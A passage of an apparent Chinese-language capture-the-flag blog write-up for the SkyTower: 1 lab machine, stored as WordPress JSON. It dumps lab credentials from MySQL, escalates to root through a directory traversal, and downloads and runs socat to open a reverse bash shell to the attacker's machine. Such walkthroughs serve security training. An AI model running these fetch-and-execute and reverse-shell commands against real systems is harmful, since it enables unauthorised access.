rows in set (0.00 sec)\n\nmysql&gt; use SkyTech;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nmysql&gt; show tables;\n+-------------------+\n| Tables_in_SkyTech |\n+-------------------+\n| login             |\n+-------------------+\n1 row in set (0.00 sec)\n\nmysql&gt; select * from login;\n+----+---------------------+--------------+\n| id | email               | password     |\n+----+---------------------+--------------+\n|  1 | john@skytech.com    | hereisjohn   |\n|  2 | sara@skytech.com    | ihatethisjob |\n|  3 | william@skytech.com | senseable    |\n+----+---------------------+--------------+\n3 rows in set (0.00 sec)<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4f7f\u7528 ssh 
\u8fdb\u884c\u767b\u9646\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608791.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608791.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221153722263\" \/><\/div><\/p>\n<p>\u663e\u793a\u53ef\u4ee5\u4ee5root\u6743\u9650\u6267\u884c<code>cat\/ls<\/code>\u5bf9<code>\/accounts<\/code>\uff0c\u76ee\u5f55\u7a7f\u8d8a\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608792.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608792.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221154401243\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u83b7\u53d6flag\uff0c\u4ece\u800c\u83b7\u53d6\u5230\u4e86root\u5bc6\u7801\uff0c\u83b7\u53d6\u5230\u4e86root\u6743\u9650\uff01\uff01\uff01<\/p>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<p>\u4f7f\u7528<code>-C 
bash<\/code>\u83b7\u53d6\u5230\u4e86shell\u4ee5\u540e\uff0c\u6211\u4eec\u9700\u8981\u83b7\u53d6\u66f4\u52a0\u65b9\u4fbf\u7684shell\uff0c\u6211\u5728\u4e00\u4e2a\u5e08\u5085\u7684<a href=\"https:\/\/www.c0dedead.io\/skytower-1-walkthrough\/\">blog<\/a>\u4e0a\u770b\u5230\u4e86\u76f8\u5173\u65b9\u6cd5\uff1a<\/p>\n<pre><code class=\"language-bash\"># kali\nsocat file:`tty`,rawer tcp-listen:4444,reuseaddr\n# SkyTower\ncd \/home\/john\n# 注意：--no-check-certificate 关掉了 TLS 证书校验，而且下载下来的二进制紧接着就 chmod +x 执行；靶场里无所谓，真实环境里应先核对来源和校验和再运行。\nwget --no-check-certificate https:\/\/github.com\/ernw\/static-toolbox\/releases\/download\/socat-v1.7.4.4\/socat-1.7.4.4-x86_64 -O socat\nchmod +x socat\nHOME=\/dev\/shm .\/socat tcp:192.168.244.128:4444 exec:&#039;\/bin\/bash -li&#039;,pty,stderr,sigint,sighup,sigquit,sane\n# HOME=\/dev\/shm 的作用：-li 启动的是登录且交互式的 bash，它按 $HOME 去找 .profile \/ .bashrc；\n# 把 HOME 指到 \/dev\/shm 后这些文件都不存在，于是绕开了 \/home\/john\/.bashrc 末尾那句 exit，而不必真的删掉它。<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608793.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608793.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221160354272\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u83b7\u53d6\u5230\u4e86shell\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>SKYTOWER: 1 \u6253\u5f00\u9776\u673a\uff0c\u8bbe\u4e3aNAT\u6a21\u5f0f\uff1a \u626b\u4e00\u4e0b\uff0c\u6ca1\u626b\u51fa\u6765\uff1a \u751f\u6210\u9776\u573a 
\u7528vmware\u6253\u5f00\u8bd5\u8bd5\uff0c\u5148\u8981 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-371","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/371","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=371"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/371\/revisions"}],"predecessor-version":[{"id":372,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/371\/revisions\/372"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=371"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=371"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=371"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}